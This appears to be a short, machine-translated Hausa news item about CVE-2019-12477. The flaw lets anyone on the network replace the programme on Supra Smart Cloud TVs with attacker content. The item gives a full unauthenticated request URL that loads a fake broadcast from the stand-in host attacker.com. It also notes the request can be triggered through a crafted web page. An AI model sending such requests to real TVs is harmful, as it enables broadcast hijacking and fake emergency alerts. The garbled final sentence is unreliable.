Akan Supra Smart Cloud TVs rauni (CVE-2019-12477) wanda ke ba ku damar maye gurbin shirin da ake kallo a halin yanzu tare da abun ciki na maharin. A matsayin misali, ana nuna fitowar gargaɗin tatsuniya game da yanayin gaggawa.
Don hari, ya isa a aika buƙatun hanyar sadarwa na musamman wanda baya buƙatar tantancewa. Musamman, zaku iya samun dama ga mai kula da "/remote/media_control?action=setUri&uri=" ta hanyar tantance URL na fayil ɗin m3u8 tare da sigogin bidiyo, misali "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8."
A mafi yawan lokuta, samun damar shiga adireshin IP na TV yana iyakance ga hanyar sadarwa ta ciki, amma tunda ana aika buƙatar ta hanyar HTTP, yana yiwuwa a yi amfani da hanyoyin samun damar albarkatun ciki lokacin da mai amfani ya buɗe wani shafi na musamman da aka ƙera (misali, ƙarƙashin ƙasa). siffar buƙatun hoto ko amfani da ).
source: budenet.ru